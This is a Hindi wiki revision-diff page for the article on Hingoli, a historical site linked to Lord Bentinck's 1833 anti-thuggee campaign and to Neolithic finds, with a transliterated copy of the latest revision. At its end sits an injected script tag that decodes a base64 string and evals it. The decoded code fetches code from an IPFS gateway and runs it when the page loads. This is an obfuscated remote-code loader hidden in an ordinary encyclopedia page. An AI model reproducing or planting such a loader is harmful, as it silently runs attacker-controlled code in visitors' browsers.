Difference between revisions of "हिंगोली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*लार्ड बैंटिक के शासनकाल में (183...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
*[[लॉर्ड विलियम बैंटिक|लार्ड बैंटिक]] के शासनकाल में (1833 ई॰) ठगी की प्रथा के उत्सादनार्थ जो महाभियान आरम्भ किया था उसका आरम्भ इसी स्थान से हुआ था।  
+
'''हिंगोली''' एक ऐतिहासिक स्थान है। [[लॉर्ड विलियम बैंटिक|लार्ड बैंटिक]] के शासनकाल में (1833 ई॰) ठगी की प्रथा के उत्सादनार्थ जो महाभियान आरम्भ किया था उसका आरम्भ इसी स्थान से हुआ था।  
 
*हिंगोली तालुके में कई स्थानों पर नवपाषाणयुगीन प्रस्तर-उपकरण तथा हथियार प्राप्त हुए हैं।
 
*हिंगोली तालुके में कई स्थानों पर नवपाषाणयुगीन प्रस्तर-उपकरण तथा हथियार प्राप्त हुए हैं।
  
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{औपनिवेशिक काल}}
 +
[[Category:औपनिवेशिक काल]]
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
[[Category:नया पन्ना सितम्बर-2012]]
+
[[Category:ऐतिहासिक स्थान कोश]]
  
 
__INDEX__
 
__INDEX__

Latest revision as of 14:44, 9 August 2014

hiangoli ek aitihasik sthan hai. lard baiantik ke shasanakal mean (1833 ee॰) thagi ki pratha ke utsadanarth jo mahabhiyan arambh kiya tha usaka arambh isi sthan se hua tha.

  • hiangoli taluke mean kee sthanoan par navapashanayugin prastar-upakaran tatha hathiyar prapt hue haian.


tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>